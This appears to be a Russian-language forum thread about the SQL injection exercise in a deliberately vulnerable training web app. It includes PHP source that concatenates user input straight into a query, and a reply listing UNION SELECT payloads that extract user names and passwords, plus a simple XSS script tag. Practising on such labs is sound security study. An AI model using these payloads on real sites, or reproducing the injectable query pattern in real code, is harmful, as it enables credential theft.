Не могу пройти SQL inejction даже на LOW (( Помогите пожалуйста. Если можно с небольшим обьяснением. ВОт Сорс : Code: <?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); $num = mysql_numrows($result); $i = 0; while ($i < $num) { $first = mysql_result($result,$i,"first_name"); $last = mysql_result($result,$i,"last_name"); echo '<pre>'; echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; echo '</pre>'; $i++; } } ?> Извиняюсь что апаю тему, но нужно..
SQL inj. low. -1' UNION SELECT user,password FROM users -- SQL inj medium. -1 UNION SELECT user,password FROM users -- xss low. <script>alert('ololo')</script> всё что нарыл пока что.
